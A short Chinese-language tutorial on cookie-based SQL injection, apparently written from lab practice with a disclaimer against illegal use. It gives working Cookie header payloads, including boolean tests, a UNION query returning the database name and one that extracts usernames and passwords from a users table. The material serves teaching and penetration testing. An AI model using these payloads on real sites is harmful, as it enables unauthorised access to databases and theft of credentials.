文中详细讲解web安全之SQL注入,通过文中内容更加深入的掌握SQL注入的原理及检测方法,从而更好的用于渗透测试中;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
web安全之SQL注入(七)
cookie注入
原理
cookie注入和post、get区别不大,只是传递的方式不同,post是在正文中传递,而get是在url传递参数,cookie就是在cookie值里面传递值
当存在cookie注入时,我们只需要通过修改cookie的值,用来检测是否存在cookie注入即可。
代码分析
从图中的代码我们分析出存在cookie注入。
漏洞演示
通过在cookie的值里面写入攻击语句进行判断是否存在注入
Cookie: uname='and%201=1--%20
Cookie: uname='and%201=2--%20
根据两次页面返回不同,来判断存在cookie注入。
然后我们同样就可以在这里写入攻击语句,来进行敏感数据获取。
Cookie: uname=-1' union select 1,2,database()#
这里我们通常是在Params中进行修改,这边会自动帮我们进行url编码,如果在Raw页面直接添加或修改cookie值时,需注意进行url编码。
获取账户和密码。
Cookie: uname=-1' union select 1,2,(select concat(username,0x3A,password) from users limit 0,1)#